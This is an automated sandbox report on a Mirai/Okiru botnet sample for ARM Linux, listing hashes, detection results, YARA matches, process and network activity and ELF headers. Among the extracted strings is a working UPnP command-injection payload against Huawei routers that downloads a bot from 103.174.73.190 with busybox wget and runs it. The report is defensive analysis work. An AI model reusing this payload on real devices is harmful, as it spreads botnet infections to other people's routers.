Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
QZQ12u96SP.elf

Overview

General Information

Sample name:QZQ12u96SP.elf
renamed because original name is a hash value
Original sample name:befb0799318870002d28e4484c1cc30e.elf
Analysis ID:1428721
MD5:befb0799318870002d28e4484c1cc30e
SHA1:d8c03c14c3c5ba0b10274c064b45e6b5be36bb6b
SHA256:3b9db29e1d83538f4284a683e14b588d78d78d423ede9b430a5d91f5266f3638
Tags:32armelfgafgyt
Infos:

Detection

Mirai, Okiru
Score:88
Range:0 - 100
Whitelisted:false

Signatures

Antivirus / Scanner detection for submitted sample
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected Mirai
Yara detected Okiru
Executes the "rm" command used to delete files or directories
Found strings indicative of a multi-platform dropper
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample has stripped symbol table
Uses the "uname" system call to query kernel version information (possible evasion)
Yara signature match

Classification

Analysis Advice

Static ELF header machine description suggests that the sample might not execute correctly on this machine.
Exit code information suggests that the sample terminated abnormally, try to lookup the sample's target architecture.
Non-zero exit code suggests an error during the execution. Lookup the error code for hints.
Static ELF header machine description suggests that the sample might only run correctly on MIPS or ARM architectures.
Joe Sandbox version:40.0.0 Tourmaline
Analysis ID:1428721
Start date and time:2024-04-19 13:14:05 +02:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 4m 36s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:QZQ12u96SP.elf
renamed because original name is a hash value
Original Sample Name:befb0799318870002d28e4484c1cc30e.elf
Detection:MAL
Classification:mal88.troj.linELF@0/0@2/0
Command:/tmp/QZQ12u96SP.elf
PID:5424
Exit Code:139
Exit Code Info:SIGSEGV (11) Segmentation fault invalid memory reference
Killed:False
Standard Output:

Standard Error:qemu: uncaught target signal 11 (Segmentation fault) - core dumped
  • system is lnxubuntu20
  • QZQ12u96SP.elf (PID: 5424, Parent: 5348, MD5: 5ebfcae4fe2471fcc5695c2394773ff1) Arguments: /tmp/QZQ12u96SP.elf
  • dash New Fork (PID: 5489, Parent: 3593)
  • rm (PID: 5489, Parent: 3593, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -f /tmp/tmp.1xqirBlELv /tmp/tmp.LwJeESmqlD /tmp/tmp.SrqeG7vBqM
  • dash New Fork (PID: 5490, Parent: 3593)
  • rm (PID: 5490, Parent: 3593, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -f /tmp/tmp.1xqirBlELv /tmp/tmp.LwJeESmqlD /tmp/tmp.SrqeG7vBqM
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
MiraiMirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai
SourceRuleDescriptionAuthorStrings
QZQ12u96SP.elfJoeSecurity_OkiruYara detected OkiruJoe Security
    QZQ12u96SP.elfJoeSecurity_Mirai_3Yara detected MiraiJoe Security
      QZQ12u96SP.elfJoeSecurity_Mirai_8Yara detected MiraiJoe Security
        QZQ12u96SP.elfLinux_Trojan_Gafgyt_28a2fe0cunknownunknown
        • 0x1e43c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x1e450:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x1e464:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x1e478:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x1e48c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x1e4a0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x1e4b4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x1e4c8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x1e4dc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x1e4f0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x1e504:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x1e518:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x1e52c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x1e540:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x1e554:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x1e568:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x1e57c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x1e590:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x1e5a4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x1e5b8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x1e5cc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        SourceRuleDescriptionAuthorStrings
        5424.1.00007feca4017000.00007feca4039000.r-x.sdmpJoeSecurity_OkiruYara detected OkiruJoe Security
          5424.1.00007feca4017000.00007feca4039000.r-x.sdmpJoeSecurity_Mirai_3Yara detected MiraiJoe Security
            5424.1.00007feca4017000.00007feca4039000.r-x.sdmpJoeSecurity_Mirai_8Yara detected MiraiJoe Security
              5424.1.00007feca4017000.00007feca4039000.r-x.sdmpLinux_Trojan_Gafgyt_28a2fe0cunknownunknown
              • 0x1e43c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
              • 0x1e450:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
              • 0x1e464:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
              • 0x1e478:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
              • 0x1e48c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
              • 0x1e4a0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
              • 0x1e4b4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
              • 0x1e4c8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
              • 0x1e4dc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
              • 0x1e4f0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
              • 0x1e504:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
              • 0x1e518:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
              • 0x1e52c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
              • 0x1e540:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
              • 0x1e554:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
              • 0x1e568:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
              • 0x1e57c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
              • 0x1e590:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
              • 0x1e5a4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
              • 0x1e5b8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
              • 0x1e5cc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
              Process Memory Space: QZQ12u96SP.elf PID: 5424JoeSecurity_OkiruYara detected OkiruJoe Security
                Click to see the 2 entries
                No Snort rule has matched

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: QZQ12u96SP.elfAvira: detected
                Source: QZQ12u96SP.elfReversingLabs: Detection: 60%
                Source: QZQ12u96SP.elfVirustotal: Detection: 48%Perma Link
                Source: QZQ12u96SP.elfString: /proc/proc/%d/cmdlinewgetcurlbusybox/bin/busyboxechocatnanotfptkillallpkilltopxargspgrep u
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownDNS traffic detected: queries for: daisy.ubuntu.com
                Source: QZQ12u96SP.elfString found in binary or memory: http://103.174.73.190/tajma.mpsl;
                Source: QZQ12u96SP.elfString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                Source: QZQ12u96SP.elfString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 37674
                Source: unknownNetwork traffic detected: HTTP traffic on port 37674 -> 443

                System Summary

                barindex
                Source: QZQ12u96SP.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
                Source: 5424.1.00007feca4017000.00007feca4039000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
                Source: Process Memory Space: QZQ12u96SP.elf PID: 5424, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
                Source: Initial sampleString containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.174.73.190 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: Initial sampleString containing 'busybox' found: /bin/busybox/
                Source: Initial sampleString containing 'busybox' found: busybox
                Source: Initial sampleString containing 'busybox' found: /bin/busybox
                Source: Initial sampleString containing 'busybox' found: HTTP/1.1 200 OKskyljneegay.armskyljneegay.arm5skyljneegay.arm6skyljneegay.arm7skyljneegay.mipsskyljneegay.mpslskyljneegay.x86_64skyljneegay.sh4<?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.174.73.190 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                Source: Initial sampleString containing 'busybox' found: Content-Length: /proc//proc/%s/exe/proc/self/exe/var/Challenge//app/hi3511/gmDVRibox/usr/dvr_main _8182T_1108/mnt/mtd/app/gui/var/Kylin/l0 c/udevd/anko-app/ankosample _8182T_1104/var/tmp/sonia/hicorestm_hi3511_dvr/bin/busybox//usr/lib/systemd/systemd//usr/libexec/openssh/sftp-server/usr/shellmnt/sys//bin/boot/media/srv/var/run/sbin/lib/etc/dev/home/Davinci/telnetsshwatchdog/var/spool//var/Sofia/sshd/usr/compress/bin//compress/bin/compress/usr/bashtelnetddropbearropbearencodercundi/var/cundi//var/Condi/system/root/dvr_gui//root/dvr_app//var/tmp//anko-app//data/local/tmp//usr/lib/systemd//system/system/bin//gm/bin//mnt//home/process//home/helper/home/davinci/z/bin//mnt/mtd//tmp/sqfs//usr/libexec//usr/sbin//z/zbin//usr/bin/usr/lib/openssh/sftp-server//opt/POST /goform/set_LimitClient_cfg HTTP/1.1
                Source: Initial sampleString containing 'busybox' found: /proc/proc/%d/cmdlinewgetcurlbusybox/bin/busyboxechocatnanotfptkillallpkilltopxargspgrep u
                Source: ELF static info symbol of initial sample.symtab present: no
                Source: QZQ12u96SP.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
                Source: 5424.1.00007feca4017000.00007feca4039000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
                Source: Process Memory Space: QZQ12u96SP.elf PID: 5424, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
                Source: classification engineClassification label: mal88.troj.linELF@0/0@2/0
                Source: /usr/bin/dash (PID: 5489)Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.1xqirBlELv /tmp/tmp.LwJeESmqlD /tmp/tmp.SrqeG7vBqMJump to behavior
                Source: /usr/bin/dash (PID: 5490)Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.1xqirBlELv /tmp/tmp.LwJeESmqlD /tmp/tmp.SrqeG7vBqMJump to behavior
                Source: /tmp/QZQ12u96SP.elf (PID: 5424)Queries kernel information via 'uname': Jump to behavior
                Source: QZQ12u96SP.elf, 5424.1.00005650a4f48000.00005650a5076000.rw-.sdmpBinary or memory string: PV!/etc/qemu-binfmt/arm
                Source: QZQ12u96SP.elf, 5424.1.00007fff8f11b000.00007fff8f13c000.rw-.sdmpBinary or memory string: x86_64/usr/bin/qemu-arm/tmp/QZQ12u96SP.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/QZQ12u96SP.elf
                Source: QZQ12u96SP.elf, 5424.1.00005650a4f48000.00005650a5076000.rw-.sdmpBinary or memory string: /etc/qemu-binfmt/arm
                Source: QZQ12u96SP.elf, 5424.1.00007fff8f11b000.00007fff8f13c000.rw-.sdmpBinary or memory string: /usr/bin/qemu-arm
                Source: QZQ12u96SP.elf, 5424.1.00007fff8f11b000.00007fff8f13c000.rw-.sdmpBinary or memory string: qemu: uncaught target signal 11 (Segmentation fault) - core dumped

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: QZQ12u96SP.elf, type: SAMPLE
                Source: Yara matchFile source: 5424.1.00007feca4017000.00007feca4039000.r-x.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: QZQ12u96SP.elf PID: 5424, type: MEMORYSTR
                Source: Yara matchFile source: QZQ12u96SP.elf, type: SAMPLE
                Source: Yara matchFile source: 5424.1.00007feca4017000.00007feca4039000.r-x.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: QZQ12u96SP.elf PID: 5424, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: QZQ12u96SP.elf, type: SAMPLE
                Source: Yara matchFile source: 5424.1.00007feca4017000.00007feca4039000.r-x.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: QZQ12u96SP.elf PID: 5424, type: MEMORYSTR
                Source: Yara matchFile source: QZQ12u96SP.elf, type: SAMPLE
                Source: Yara matchFile source: 5424.1.00007feca4017000.00007feca4039000.r-x.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: QZQ12u96SP.elf PID: 5424, type: MEMORYSTR
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity Information1
                Scripting
                Valid AccountsWindows Management Instrumentation1
                Scripting
                Path Interception1
                File Deletion
                OS Credential Dumping11
                Security Software Discovery
                Remote ServicesData from Local System1
                Encrypted Channel
                Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media1
                Non-Application Layer Protocol
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive2
                Application Layer Protocol
                Automated ExfiltrationData Encrypted for Impact
                No configs have been found
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Number of created Files
                • Is malicious
                • Internet
                SourceDetectionScannerLabelLink
                QZQ12u96SP.elf61%ReversingLabsLinux.Trojan.Mirai
                QZQ12u96SP.elf48%VirustotalBrowse
                QZQ12u96SP.elf100%AviraEXP/ELF.Mirai.Z.A
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                NameIPActiveMaliciousAntivirus DetectionReputation
                daisy.ubuntu.com
                162.213.35.25
                truefalse
                  high
                  NameSourceMaliciousAntivirus DetectionReputation
                  http://103.174.73.190/tajma.mpsl;QZQ12u96SP.elffalse
                    unknown
                    http://schemas.xmlsoap.org/soap/encoding/QZQ12u96SP.elffalse
                      high
                      http://schemas.xmlsoap.org/soap/envelope/QZQ12u96SP.elffalse
                        high
                        • No. of IPs < 25%
                        • 25% < No. of IPs < 50%
                        • 50% < No. of IPs < 75%
                        • 75% < No. of IPs
                        IPDomainCountryFlagASNASN NameMalicious
                        54.217.10.153
                        unknownUnited States
                        16509AMAZON-02USfalse
                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        54.217.10.153OTBVplDFut.elfGet hashmaliciousUnknownBrowse
                          vlxx.mips-20240418-1853.elfGet hashmaliciousMirai, OkiruBrowse
                            MCKV8ZxDFs.elfGet hashmaliciousMiraiBrowse
                              yRXn4O3AgO.elfGet hashmaliciousGafgyt, MiraiBrowse
                                F5owD542qK.elfGet hashmaliciousMiraiBrowse
                                  IOBZiJI5W8.elfGet hashmaliciousGafgyt, MiraiBrowse
                                    pKz76hY1YS.elfGet hashmaliciousGafgyt, MiraiBrowse
                                      Dp3wDs887k.elfGet hashmaliciousMiraiBrowse
                                        gSMmt9KfOh.elfGet hashmaliciousGafgytBrowse
                                          xu4uPf2rLF.elfGet hashmaliciousGafgytBrowse
                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            daisy.ubuntu.comMqFwPcgsJ6.elfGet hashmaliciousMirai, OkiruBrowse
                                            • 162.213.35.24
                                            FtRTuVcia6.elfGet hashmaliciousMirai, OkiruBrowse
                                            • 162.213.35.25
                                            G7HgHiQE1U.elfGet hashmaliciousMirai, OkiruBrowse
                                            • 162.213.35.25
                                            5pl5TxJ4lJ.elfGet hashmaliciousMirai, OkiruBrowse
                                            • 162.213.35.25
                                            2cZvbPkMmG.elfGet hashmaliciousMirai, OkiruBrowse
                                            • 162.213.35.25
                                            ZRI7AeFEI7.elfGet hashmaliciousMirai, OkiruBrowse
                                            • 162.213.35.25
                                            Hft4YboT6s.elfGet hashmaliciousMirai, OkiruBrowse
                                            • 162.213.35.25
                                            pcDPclfqrB.elfGet hashmaliciousMirai, OkiruBrowse
                                            • 162.213.35.25
                                            uFOd62iz2f.elfGet hashmaliciousMirai, OkiruBrowse
                                            • 162.213.35.25
                                            Lx4Z8fLn0G.elfGet hashmaliciousMirai, Moobot, OkiruBrowse
                                            • 162.213.35.25
                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            AMAZON-02USmCS7AR9pKm.elfGet hashmaliciousMirai, OkiruBrowse
                                            • 44.244.87.34
                                            JX1KTFsitM.elfGet hashmaliciousOkiruBrowse
                                            • 34.249.145.219
                                            NlF293hgXW.elfGet hashmaliciousMirai, OkiruBrowse
                                            • 54.247.62.1
                                            FZqYclxRiu.elfGet hashmaliciousMirai, OkiruBrowse
                                            • 34.249.145.219
                                            PN9QHDmpS1.elfGet hashmaliciousMirai, OkiruBrowse
                                            • 54.247.62.1
                                            eGjHpgUwlt.elfGet hashmaliciousMirai, OkiruBrowse
                                            • 34.254.182.186
                                            9PYUxFx9pK.elfGet hashmaliciousMirai, Moobot, OkiruBrowse
                                            • 34.243.160.129
                                            New Voicemail_Daiichi-Sankyo.htmlGet hashmaliciousHTMLPhisherBrowse
                                            • 3.161.136.96
                                            XioVUcbE3G.elfGet hashmaliciousUnknownBrowse
                                            • 34.249.145.219
                                            s02RKS8Moh.elfGet hashmaliciousUnknownBrowse
                                            • 54.247.62.1
                                            No context
                                            No context
                                            No created / dropped files found
                                            File type:ELF 32-bit LSB executable, ARM, EABI4 version 1 (SYSV), statically linked, stripped
                                            Entropy (8bit):5.6897895315211295
                                            TrID:
                                            • ELF Executable and Linkable format (generic) (4004/1) 100.00%
                                            File name:QZQ12u96SP.elf
                                            File size:154'940 bytes
                                            MD5:befb0799318870002d28e4484c1cc30e
                                            SHA1:d8c03c14c3c5ba0b10274c064b45e6b5be36bb6b
                                            SHA256:3b9db29e1d83538f4284a683e14b588d78d78d423ede9b430a5d91f5266f3638
                                            SHA512:b6f6f38a08a03c139fc0835c741b3b6062d3574efcf9afe1ef5d361fa2beebc914ef23310b01f8c30f0a055edb07a1c044f46a1c418f8f994ec61246922eab02
                                            SSDEEP:3072:Rmgx8ikKJUatj1jXlA4tw4aGijSlW/R4C0b77RY6:QgqWJxDjX24t1aPCdpb77RZ
                                            TLSH:01E30A46F8819B12C5D111BAFE1E128E37131B78E2DE72029D246F747B8A97F0E3B915
                                            File Content Preview:.ELF..............(.....T...4...4[......4. ...(......................................................I..............Q.td..................................-...L..................@-.,@...0....S..... 0....S.........../..0...0...@..../..Z............-.@0....S

                                            ELF header

                                            Class:ELF32
                                            Data:2's complement, little endian
                                            Version:1 (current)
                                            Machine:ARM
                                            Version Number:0x1
                                            Type:EXEC (Executable file)
                                            OS/ABI:UNIX - System V
                                            ABI Version:0
                                            Entry Point Address:0x8154
                                            Flags:0x4000002
                                            ELF Header Size:52
                                            Program Header Offset:52
                                            Program Header Size:32
                                            Number of Program Headers:3
                                            Section Header Offset:154420
                                            Section Header Size:40
                                            Number of Section Headers:13
                                            Header String Table Index:12
                                            NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
                                            NULL0x00x00x00x00x0000
                                            .initPROGBITS0x80940x940x100x00x6AX004
                                            .textPROGBITS0x80b00xb00x1e2a00x00x6AX0016
                                            .finiPROGBITS0x263500x1e3500x100x00x6AX004
                                            .rodataPROGBITS0x263600x1e3600x2e540x00x2A008
                                            .init_arrayINIT_ARRAY0x311b80x211bc0x80x00x3WA004
                                            .fini_arrayFINI_ARRAY0x311c00x211c40x40x00x3WA004
                                            .data.rel.roPROGBITS0x311c80x211cc0x780x00x3WA004
                                            .gotPROGBITS0x312400x212440x11c0x40x3WA004
                                            .dataPROGBITS0x313600x213640x47540x00x3WA0032
                                            .bssNOBITS0x35ab80x25ab80x49000x00x3WA008
                                            .ARM.attributesARM_ATTRIBUTES0x00x25ab80x100x00x0001
                                            .shstrtabSTRTAB0x00x25ac80x6a0x00x0001
                                            TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                                            LOAD0x00x80000x80000x211b40x211b46.12600x5R E0x8000.init .text .fini .rodata
                                            LOAD0x211b80x311b80x311b40x49000x92000.58540x6RW 0x8000.init_array .fini_array .data.rel.ro .got .data .bss
                                            GNU_STACK0x00x00x00x00x00.00000x7RWE0x4
                                            TimestampSource PortDest PortSource IPDest IP
                                            Apr 19, 2024 13:15:01.111567020 CEST37674443192.168.2.1354.217.10.153
                                            Apr 19, 2024 13:15:16.022407055 CEST37674443192.168.2.1354.217.10.153
                                            Apr 19, 2024 13:15:16.232144117 CEST4433767454.217.10.153192.168.2.13
                                            TimestampSource PortDest PortSource IPDest IP
                                            Apr 19, 2024 13:14:51.242366076 CEST4829653192.168.2.131.1.1.1
                                            Apr 19, 2024 13:14:51.242366076 CEST5496253192.168.2.131.1.1.1
                                            Apr 19, 2024 13:14:51.347513914 CEST53549621.1.1.1192.168.2.13
                                            Apr 19, 2024 13:14:51.347639084 CEST53482961.1.1.1192.168.2.13
                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                            Apr 19, 2024 13:14:51.242366076 CEST192.168.2.131.1.1.10x6478Standard query (0)daisy.ubuntu.comA (IP address)IN (0x0001)false
                                            Apr 19, 2024 13:14:51.242366076 CEST192.168.2.131.1.1.10x6488Standard query (0)daisy.ubuntu.com28IN (0x0001)false
                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                            Apr 19, 2024 13:14:51.347639084 CEST1.1.1.1192.168.2.130x6478No error (0)daisy.ubuntu.com162.213.35.25A (IP address)IN (0x0001)false
                                            Apr 19, 2024 13:14:51.347639084 CEST1.1.1.1192.168.2.130x6478No error (0)daisy.ubuntu.com162.213.35.24A (IP address)IN (0x0001)false

                                            System Behavior

                                            Start time (UTC):11:14:48
                                            Start date (UTC):19/04/2024
                                            Path:/tmp/QZQ12u96SP.elf
                                            Arguments:/tmp/QZQ12u96SP.elf
                                            File size:4956856 bytes
                                            MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                            Start time (UTC):11:15:15
